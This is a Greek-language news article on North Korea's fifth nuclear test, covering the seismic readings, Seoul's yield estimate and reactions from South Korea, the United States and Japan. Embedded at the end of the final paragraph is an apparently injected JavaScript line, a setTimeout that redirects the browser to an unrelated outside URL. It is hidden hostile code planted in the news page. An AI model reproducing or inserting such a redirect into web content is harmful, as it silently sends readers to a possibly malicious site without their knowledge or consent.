Η Β. Κορέα έκανε την ισχυρότερη πυρηνική δοκιμή στην ιστορία της

0
7

 

Σεισμός μεγέθους 5,3 βαθμών της κλίμακας Ρίχτερ κατέγραψε το Γεωλογικό Ινστιτούτο των ΗΠΑ (USGS) στη Βόρεια Κορέα, κοντά σε ένα πεδίο πυρηνικών δοκιμών.Η δόνηση σημειώθηκε στις 09:30 τοπική ώρα και το εστιακό της βάθος ήταν μηδενικό, σύμφωνα με το USGS.

Η Σεούλ σημείωσε πως υπάρχει «ισχυρή πιθανότητα» η Βόρεια Κορέα να διεξήγαγε μια πυρηνική δοκιμή και η χώρα να δοκίμασε την «πιο ισχυρή» πυρηνική βόμβα που παρήγαγε ως σήμερα, σύμφωνα με το Yonhap.

«Θεωρούμε ότι ο Βορράς διεξήγαγε σήμερα μια πυρηνική δοκιμή», είπε αξιωματούχος του υπουργείου Άμυνας στο πρακτορείο. Η Σεούλ εκτιμά ότι η «η έκρηξη είχε ισχύ περίπου 10 κιλοτόνων», γεγονός που σημαίνει ότι η πυρηνική βόμβα που δοκιμάστηκε είναι «η ισχυρότερη» που έχει κατασκευάσει η Βόρεια Κορέα «μέχρι σήμερα», πρόσθεσε η ίδια πηγή.

Λίγο αργότερα, το κινεζικό πρακτορείο Xinhua μετέδωσε πως η Βόρεια Κορέα ανακοίνωσε κι επισήμως την επιτυχή διεξαγωγή της 5ης πυρηνικής δοκιμής της.

Η Σεούλ θα αξιώσει από το ΣΑ του ΟΗΕ να επιβάλει αυστηρότερες κυρώσεις στη Βόρεια Κορέα.

Η Νότια Κορέα θα καταβάλει διπλωματικές προσπάθειες για να επιβληθούν ακόμη πιο ισχυρές κυρώσεις από το Συμβούλιο Ασφαλείας του ΟΗΕ στη Βόρεια Κορέα.

Η πρόεδρος της Νότιας Κορέας Παρκ Γκέουν-χιε καταδίκασε τη νέα πυρηνική δοκιμή από τη Βόρεια Κορέα καθώς παραβίασε για άλλη μια φορά τις αποφάσεις του Συμβουλίου Ασφαλείας του ΟΗΕ προχωρώντας σε μια άμεση πρόκληση έναντι της διεθνούς κοινότητας.

Αμέσως μετά η πρόεδρος Παρκ επικοινώνησε με τον ομόλογό της των ΗΠΑ Μπαράκ Ομπάμα και συζήτησαν για τη νέα πυρηνική δοκιμή. Ο Ομπάμα και η Παρκ είχαν τηλεφωνική συνδιάλεξη διάρκειας 15 λεπτών, καθώς ο Αμερικανός πρόεδρος επέστρεφε με το Air Force One στην Ουάσινγκτον από τη σύνοδο του ASEAN στο Λάος, σύμφωνα με ανακοίνωση από την προεδρία της Νότιας Κορέας.

Το Συμβούλιο Εθνικής Ασφαλείας του Λευκού Οίκου ανακοίνωσε ότι ενημερώθηκε για τη σεισμική δραστηριότητα. «Παρακολουθούμε και συνεχίζουμε να αποτιμούμε την κατάσταση σε στενό συντονισμό με τους εταίρους μας στην περιοχή», ανέφερε το ΣΕΑ σε ανακοίνωσή του.

Από την πλευρά της Ιαπωνίας, ο υπουργός Εξωτερικών Φουμίο Κισίντα δήλωσε ότι το Τόκιο επέδωσε επίσημη διαμαρτυρία στη Βόρεια Κορέα μετά την πυρηνική δοκιμή. Η δοκιμή αυτή, εάν επιβεβαιωθεί, παραβιάζει αποφάσεις του Συμβουλίου Ασφαλείας του Οργανισμού Ηνωμένων Εθνών και εγείρει μια πολύ σοβαρή πρόκληση για τις διεθνείς προσπάθειες κατά της εξάπλωσης των πυρηνικών όπλων, τόνισε ο Κισίντα μιλώντας σε δημοσιογράφους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here